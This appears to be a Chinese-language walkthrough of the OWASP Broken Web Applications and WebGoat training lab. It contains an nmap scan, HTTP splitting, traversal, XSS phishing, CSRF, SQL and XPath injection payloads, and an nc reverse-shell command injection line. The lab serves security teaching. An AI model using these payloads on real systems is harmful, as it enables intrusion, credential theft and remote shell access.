简介
下载:https://sourceforge.net/projects/owaspbwa/files/
GitHub: https://github.com/chuckfw/owaspbwa/wiki/UserGuide
0x001 侦查
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 ea:83:1e:45:5a:a6:8c:43:1c:3c:e3:18:dd:fc:88:a5 (DSA)
|_ 2048 3a:94:d8:3f:e0:a2:7a:b8:c3:94:d7:5e:00:55:0c:a7 (RSA)
80/tcp open http Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
|_http-title: owaspbwa OWASP Broken Web Applications
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Courier Imapd (released 2008)
|_imap-capabilities: UIDPLUS THREAD=ORDEREDSUBJECT THREAD=REFERENCES completed IDLE QUOTA OK CAPABILITY ACL ACL2=UNIONA0001 CHILDREN IMAP4rev1 SORT NAMESPACE
443/tcp open ssl/https?
|_ssl-date: 2018-12-17T06:55:14+00:00; 0s from scanner time.
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
5001/tcp open java-rmi Java RMI
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Site doesn't have a title.
8081/tcp open http Jetty 6.1.25
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Jetty(6.1.25)
|_http-title: Choose Your Path
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5001-TCP:V=7.70%I=7%D=12/17%Time=5C174849%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4,"\xac\xed\0\x05");
MAC Address: F4:B7:E2:01:6D:06 (Hon Hai Precision Ind.)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_nbstat: NetBIOS name: OWASPBWA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)0x002 General
http服务器缓存利用 HTTP Splitting
#当对服务器发请求
HTTP/1.1 302 Moved Temporarily
Date: Mon, 17 Dec 2018 14:21:31 GMT
Server: Apache-Coyote/1.1
Location: http://192.168.1.104/WebGoat/attack?Screen=3&menu=100&fromRedirect=yes&language=en #重点在这
Content-Type: text/html;charset=ISO-8859-1
Via: 1.1 127.0.1.1
Vary: Accept-Encoding
Content-Length: 0
Connection: close构造恶意代码
en%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0aInsert undesireable content hereen%0d%0aContent-length%3a+0%0d%0a%0d%0aHTTP%2f1.1+200+OK%0d%0aContent-Type%3a+text%2fhtml%3b%0d%0aLast-Modified%3a+Thu%2c+01+Jan+2099+12%3a00%3a00+GMT+%0d%0aContent-length%3a+19%0d%0a%0d%0a%26lt%3bhtml%26gt%3bhacked%26lt%3b%2fhtml%26gt%3b0x003 Access Control Flaws
Bypass a Path Based Access Control Scheme
../../../../../../../etc/tomcat6/tomcat-users.xmlLAB: Role Based Access Control
employee_id=105&action=ViewProfile #登录后修改为 DeleteProfile0x004
Stage 1: 绕过表示层访问控制(Bypass Presentational Layer Access Control)
Tom用户 小写密码登录 然后点击ViewProfile 抓包修改数据 让Tom用户拥有 DeleteProfile 权限
employee_id=105&action=ViewProfile修改为 DeleteProfileStage 2: 添加业务层的访问控制(Add Business Layer Access Control)
要修改 org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessContro l.java 类中的相关代码
修改 handleRequest 方法
//***************CODE HERE*************************
if(!isAuthorized(s, getUserId(s), requestedActionName))
{throw new UnauthorizedException();
}
//************************************************* Stage 3: 绕过数据层访问控制(Breaking Data Layer Access Control)
选择Tom小写密码tom登录 抓包修改为Jarry的ID 101
employee_id=105&action=ViewProfile #id修改为101 Stage 4: 添加数据层访问控制(Add Data Layer Access Control)
0x005 Ajax Security
基于 DOM 的跨站点访问(LAB: DOM‐Based cross‐site scripting)
STAGE 1:
<IMG SRC="images/logos/owasp.jpg"/>STAGE 2:
<img src=x onerror=;;alert('XSS') />STAGE 3:
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>STAGE 4:
Please enter your password:<BR><input type = "password" name="pass"/><button
onClick="javascript:alert('I have your password: ' +
pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR>
<BR><BR><BR><BR><BR><BR><BR><BR> DOM 注入(DOM Injection)
拦截数据 修改body内容
document.form.SUBMIT.disabled = false;XML 注入(XML Injection)
<root>
<reward>WebGoat Core Duo Laptop 2000 Pts</reward>
<reward>WebGoat Hawaii Cruise 3000 Pts</reward>
</root>
JSON 注入(JSON Injection)
burpsuite 设置 : Proxy-Options-Intercept Server Response设置response拦截的选项:
拦截 修改 JSON数据
{
"From": "Boston",
"To": "Seattle",
"flights": [
{"stops": "0", "transit" : "N/A", "price": "$600"}, //任意修改
{"stops": "2", "transit" : "Newark,Chicago", "price": "$300"} //任意修改
]
}静默交易攻击(Silent Transactions Attacks)
查看源代码 两个关键的 JavaScript 函数 function processData() function submitData
//在页面的URL输入:
javascript:submitData(16666000,100000)
危险指令使用(Dangerous Use of Eval)
123');alert(document.cookie);(' 不安全的客户端存储(Insecure Client Storage)
选择要购买的商品 burp抓包修改金额为0
0x006 认证缺陷(Authentication Flaws)
基本认证(Basic Authentication)
Authorization
guest:guest多级登录 1(Multi Level Login 1)
STAGE 1
//用户名密码登录
用户名:Jane,密码:tarzan
TAN 15648STAGE 2
用户名:Jane,密码:tarzan
TAN 15648burp拦截 hidden_ten值修改为1
hidden_tan=1&tan=15648&Submit=Submit 0x008 缓冲区溢出(Buffer Overflows)
Off‐by‐One 缓冲区溢出(Off‐by‐One Overflows)
//随便填写
test
test
123
//request 请求拦截后发往 intruder
249.99+-+24+hours&SUBMIT=Accept+Terms&last_name=test&first_name=test&room_no=§123§
//character blocks 参数设置
base string: 3
min length: 1024
max length: 1024000
step: 1024 0x009 代码质量(Code Quality)
在 HTML 中找线索(Discover Clues in the HTML)
查看源代码中的注释可找到用户名密码
<!-- FIXME admin:adminpw --><!-- Use Admin to regenerate database -->0x010 并发(Concurrency)
线程安全问题(Thread Safety Problems)
//两个用户, 浏览器打开两个相同页面 同时提交 会看到另个用户的信息
jeff
dave购物车并发缺陷(Shopping Cart Concurrency Flaw)
选择要购买的产品,打开两个页面同时提交
0x011 跨站脚本攻击(Cross‐Site Scripting (XSS))
使用 XSS 钓鱼(Phishing with XSS) 可以使用Beef更加方便快捷
<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name
= " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new
Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";}
</script><form><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter
Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input
type="password" name = "pass"><br><input type="submit" name="login" value="login"
onclick="hack()"></form><br><br><HR>跨站脚本攻击(LAB: Cross Site Scripting)
<script>alert(document.cookie);</script>存储型 XSS 攻击(Stored XSS Attacks)
存储型XXS可以打站点后台,获得密码。如果结合beef威力更大
<script language="javascript" type="text/javascript">alert(document.cookie);</script>跨站请求伪造(Cross Site Request Forgery (CSRF))
<img src="http://localhost/WebGoat/attack?Screen=81&menu=210&transferFunds=5000" width="1"
height="1" />绕过 CSRF 确认( CSRF Prompt By‐Pass)
<img src="http://localhostattack?Screen=81&menu=210&transferFunds=5000"
onerror="document.getElementById('image2').src='http://localhostattack?Screen=81&menu=210&transf
erFunds=CONFIRM'" width="1" height="1" />
<img id="image2" width="1" height="1" /> 跨站跟踪攻击(Cross Site Tracing (XST) Attacks)
<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new
ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false);
xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>");
document.write(str1);}</script>0x012 不当的错误处理(Improper Error Handling)
打开认证失败方案(Fail Open Authentication Scheme)
burp拦截 删除password这项
0x013 注入缺陷(Injection Flaws)
命令注入(Command Injection)
" 127.0.0.1 && nc -vn 192.168.1.101 4444 -e /bin/bash数字型 SQL 注入(Numeric SQL Injection)
or 1=1日志欺骗(Log Spoofing)
Smith%0d%0aLogin Succeeded for username: adminXPATH 型注入(XPATH Injection)
Smith' or 1=1 or 'a'='a字符串型注入(String SQL Injection)
' or 1=1 --SQL 注入(LAB: SQL Injection)
smith' or '1' = '1
